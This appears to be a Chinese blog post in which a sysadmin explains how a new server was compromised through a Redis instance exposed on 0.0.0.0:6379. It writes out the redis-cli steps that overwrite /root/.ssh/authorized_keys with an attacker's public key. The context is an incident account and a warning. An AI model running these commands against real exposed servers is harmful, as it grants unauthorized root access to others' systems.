杀毒算完成了,可是他是怎么进来的呢。。。因为是我刚安装的系统,就只装了个redis和rabbitmq 其他应用都没有呢
我发现我的redis的 bind 0.0.0.0:6379
默认的。。。。应该是这边进来的。我自己做了下尝试。。。
[root@ll_sas01 ~/.ssh]# redis-cli
127.0.0.1:6379> set aa "公钥"
OK
127.0.0.1:6379> config set dir /root/.ssh/
OK
127.0.0.1:6379> config set dbfilename "authorized_keys"
OK
127.0.0.1:6379> save
[root@ll_sas01 ~/.ssh]# cat authorized_keys
ssh-rsaAAAAB3NzaC1yc2EAAAABdadasdAAQEAvPgr/WFKd9h/3e2ik6BmLj4OIdnBNJelaNCOAWwdKQx0WjDtF root@dawdaw
夭寿拉。妈蛋的竟然真的这样可以吧自己的公钥刷进来。。。
奉劝大家不要黑别人的服务器,运维何苦为难运维。。。
通过这个网站可以查到开放的数据,就不给大家公开了,我得数据可能就是在这里被获取的。
黑客攻击事件到此完了
【声明】:8090安全小组门户(http://www.8090-sec.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们:邮箱hack@ddos.kim,我们会在最短的时间内进行处理。
发表评论